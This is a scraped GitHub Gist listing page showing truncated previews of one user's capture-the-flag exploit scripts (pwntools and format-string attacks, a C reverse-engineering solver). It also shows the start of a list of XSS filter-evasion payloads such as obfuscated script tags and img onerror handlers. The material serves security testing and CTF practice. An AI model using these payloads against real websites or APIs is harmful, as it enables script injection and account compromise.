Skip to content

Instantly share code, notes, and snippets.

@laxa
laxa / EasiestPrintf.py
Created March 20, 2017 00:22
easiestprintf@0ctf2k17
#!/usr/bin/env python2
from pwn import *
###
if len(sys.argv) > 1:
DEBUG = False
else:
DEBUG = True
@laxa
laxa / solve.c
Created December 24, 2016 02:25
rev500 - 3DSCTF
#include <stdint.h>
#include <stdio.h>
#include <math.h>
uint64_t my_pow(uint64_t a, uint64_t b)
{
int64_t ret = 1;
uint64_t i;
for (i = 0; i < a; i++)
#!/usr/bin/env python2
from libformatstr import FormatStr
from pwn import *
import binascii
import struct
import time
def p32(addr):
@laxa
laxa / 666_lines_of_XSS_vectors.html
Created July 29, 2016 13:58 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>